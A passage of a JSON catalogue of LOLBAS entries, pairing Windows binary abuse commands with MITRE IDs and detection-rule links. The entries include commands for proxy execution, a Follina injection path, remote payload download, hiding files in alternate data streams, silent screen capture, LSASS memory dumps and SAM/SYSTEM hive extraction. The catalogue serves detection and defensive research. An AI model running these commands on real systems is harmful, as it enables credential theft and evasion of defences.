files","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pcwrun-exe:0","toolId":"lolbas:pcwrun-exe","toolName":"Pcwrun.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pcwrun.exe {PATH_ABSOLUTE:.exe}","description":"Open the target .EXE file with the Program Compatibility Wizard.","usecase":"Proxy execution of binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml"}],"references":["https://twitter.com/pabraeken/status/991335019833708544","https://twitter.com/nas_bench/status/1535663791362519040","https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pcwrun-exe:1","toolId":"lolbas:pcwrun-exe","toolName":"Pcwrun.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pcwrun.exe /../../$(calc).exe","description":"Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.","usecase":"Proxy execution of binary","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml"}],"references":["https://twitter.com/pabraeken/status/991335019833708544","https://twitter.com/nas_bench/status/1535663791362519040","https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pktmon-exe:0","toolId":"lolbas:pktmon-exe","toolName":"Pktmon.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"pktmon.exe start --etw","description":"Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop","usecase":"use this a built in network sniffer on windows 10 to capture senstive traffic","mitre":["T1040"],"privilege":"admin","fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml"},{"type":"IOC","value":".etl files found on system"}],"references":["https://binar-x79.com/windows-10-secret-sniffer/","https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pktmon-exe:1","toolId":"lolbas:pktmon-exe","toolName":"Pktmon.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"pktmon.exe filter add -p 445","description":"Select Desired ports for packet capture","usecase":"Look for interesting traffic such as telent or FTP","mitre":["T1040"],"privilege":"admin","fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml"},{"type":"IOC","value":".etl files found on system"}],"references":["https://binar-x79.com/windows-10-secret-sniffer/","https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pnputil-exe:0","toolId":"lolbas:pnputil-exe","toolName":"Pnputil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pnputil.exe -i -a {PATH_ABSOLUTE:.inf}","description":"Used for installing drivers","usecase":"Add malicious driver","mitre":["T1547"],"privilege":"admin","fullPath":["C:\\Windows\\system32\\pnputil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pnputil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:presentationhost-exe:0","toolId":"lolbas:presentationhost-exe","toolName":"Presentationhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Presentationhost.exe {PATH_ABSOLUTE:.xbap}","description":"Executes the target XAML Browser Application (XBAP) file","usecase":"Execute code within XBAP files","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml"},{"type":"IOC","value":"Execution of .xbap files may not be common on production workstations"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:presentationhost-exe:1","toolId":"lolbas:presentationhost-exe","toolName":"Presentationhost.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Presentationhost.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml"},{"type":"IOC","value":"Execution of .xbap files may not be common on production workstations"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:print-exe:0","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}","description":"Copy file.exe into the Alternate Data Stream (ADS) of file.txt.","usecase":"Hide binary file in alternate data stream to potentially bypass defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:print-exe:1","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe}","description":"Copy file from source to destination","usecase":"Copy files","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:print-exe:2","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe}","description":"Copy File.exe from a network share to the target c:\\OutFolder\\outfile.exe.","usecase":"Copy/Download file from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:printbrm-exe:0","toolId":"lolbas:printbrm-exe","toolName":"PrintBrm.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip}","description":"Create a ZIP file from a folder in a remote drive","usecase":"Exfiltrate the contents of a remote folder on a UNC share into a zip file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml"},{"type":"IOC","value":"PrintBrm.exe should not be run on a normal workstation"}],"references":["https://twitter.com/elliotkillick/status/1404117015447670800","https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:printbrm-exe:1","toolId":"lolbas:printbrm-exe","toolName":"PrintBrm.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder}","description":"Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder","usecase":"Decompress and extract a ZIP file stored on an alternate data stream to a new folder","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml"},{"type":"IOC","value":"PrintBrm.exe should not be run on a normal workstation"}],"references":["https://twitter.com/elliotkillick/status/1404117015447670800","https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:provlaunch-exe:0","toolId":"lolbas:provlaunch-exe","toolName":"Provlaunch.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"provlaunch.exe LOLBin","description":"Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1\\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.","usecase":"Executes arbitrary command","mitre":["T1218"],"privilege":"admin","fullPath":["c:\\windows\\system32\\provlaunch.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml"},{"type":"IOC","value":"c:\\windows\\system32\\provlaunch.exe executions"},{"type":"IOC","value":"Creation/existence of HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands subkeys"}],"references":["https://twitter.com/0gtweet/status/1674399582162153472","https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:psr-exe:0","toolId":"lolbas:psr-exe","toolName":"Psr.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0","description":"Record a user screen without creating a GUI. You should use \"psr.exe /stop\" to stop recording and create output file.","usecase":"Can be used to take screenshots of the user environment","mitre":["T1113"],"privilege":"user","fullPath":["c:\\windows\\system32\\psr.exe","c:\\windows\\syswow64\\psr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml"},{"type":"IOC","value":"psr.exe spawned"},{"type":"IOC","value":"suspicious activity when running with \"/gui 0\" flag"}],"references":["https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx","https://lolbas-project.github.io/lolbas/Binaries/Psr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:query-exe:0","toolId":"lolbas:query-exe","toolName":"Query.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"query.exe user","description":"Once executed, `query.exe` will execute `quser.exe` in the same folder. Thus, if `query.exe` is copied to a folder and an arbitrary executable is renamed to `quser.exe`, `query.exe` will spawn it. Instead of `user`, it is also possible to use `session`, `termsession` or `process` as command-line option.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\query.exe","c:\\windows\\syswow64\\query.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"query.exe being executed and executes a child process outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Query/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rasautou-exe:0","toolId":"lolbas:rasautou-exe","toolName":"Rasautou.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rasautou -d {PATH:.dll} -p export_name -a a -e e","description":"Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.","usecase":"Execute DLL code","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\rasautou.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml"},{"type":"IOC","value":"rasautou.exe command line containing -d and -p"}],"references":["https://github.com/fireeye/DueDLLigence","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/Binaries/Rasautou/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rdrleakdiag-exe:0","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1","description":"Dump process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump process by PID.","mitre":["T1003"],"privilege":"user","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rdrleakdiag-exe:1","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1","description":"Dump LSASS process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump LSASS process.","mitre":["T1003.001"],"privilege":"admin","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rdrleakdiag-exe:2","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap","description":"After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump LSASS process mutliple times.","mitre":["T1003.001"],"privilege":"admin","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:reg-exe:0","toolId":"lolbas:reg-exe","toolName":"Reg.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"reg export HKLM\\SOFTWARE\\Microsoft\\Evilreg {PATH_ABSOLUTE}:evilreg.reg","description":"Export the target Registry key and save it to the specified .REG file within an Alternate data stream.","usecase":"Hide/plant registry information in Alternate data stream for later use","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml"},{"type":"IOC","value":"reg.exe writing to an ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://pure.security/dumping-windows-credentials/","https://lolbas-project.github.io/lolbas/Binaries/Reg/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:reg-exe:1","toolId":"lolbas:reg-exe","toolName":"Reg.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"reg save HKLM\\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\\SAM {PATH_ABSOLUTE:.3.bak}","description":"Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material","usecase":"Dump credentials from the Security Account Manager (SAM)","mitre":["T1003.002"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml"},{"type":"IOC","value":"reg.exe writing to an ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://pure.security/dumping-windows-credentials/","https://lolbas-project.github.io/lolbas/Binaries/Reg/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regasm-exe:0","toolId":"lolbas:regasm-exe","toolName":"Regasm.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regasm.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute code and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"admin","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml"},{"type":"IOC","value":"regasm.exe executing dll file"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regasm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regasm-exe:1","toolId":"lolbas:regasm-exe","toolName":"Regasm.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regasm.exe /U {PATH:.dll}","description":"Loads the target .DLL file and executes the UnRegisterClass function.","usecase":"Execute code and bypass Application 